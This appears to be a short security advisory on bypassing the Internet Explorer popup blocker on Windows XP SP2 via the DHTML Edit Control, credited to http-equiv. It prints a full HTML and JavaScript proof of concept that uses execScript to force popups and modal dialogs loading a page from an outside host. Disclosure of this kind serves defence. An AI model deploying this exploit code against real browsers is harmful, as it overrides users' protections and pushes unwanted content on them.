|
Brought to you by:
Suppliers of:
|
|
|
| |
Internet Explorer for XP updated with SP2 enjoys a fairly robust popup blocking mechanism. In fact, older vulnerabilities exploited by many sites are no longer possible with the introduction of SP2 and the new popup blocker.
A way to circumvent the popup blocker has been found and it is easily exploitable as can be seen by the proof of concept supplied with this advisory. |
| |
Credit:
The information has been provided by http-equiv.
|
| |
Vulnerable Systems:
* Internet Explorer on Windows XP SP2
The vulnerability can be exploited in order to popup a dialog through the "DHTML Edit Control" with a customized script. Such a script is listed below as a proof of concept:
< body onload="setTimeout(' main() ',1000)">
< object
id="x"
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="1"
height="1"
align="middle"
>
< PARAM NAME="ActivateApplets" VALUE="1">
< PARAM NAME="ActivateActiveXControls" VALUE="1">
</object>
< SCRIPT>
// 10.11.04 http://www.editive.com
function shellscript()
{
open("http://www.malware.com/flywin.html","_blank","scrollbar=no");
showModalDialog("http://www.malware.com/flywin.html");
}
function main()
{
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
}
</SCRIPT>
<br><br><br><br><br><br><center><img src=nocigar.gif><br><br><FONT FACE=ARIAL SIZE 12PT>NO CIGAR !</FONT></center>
|
|
|
|
|
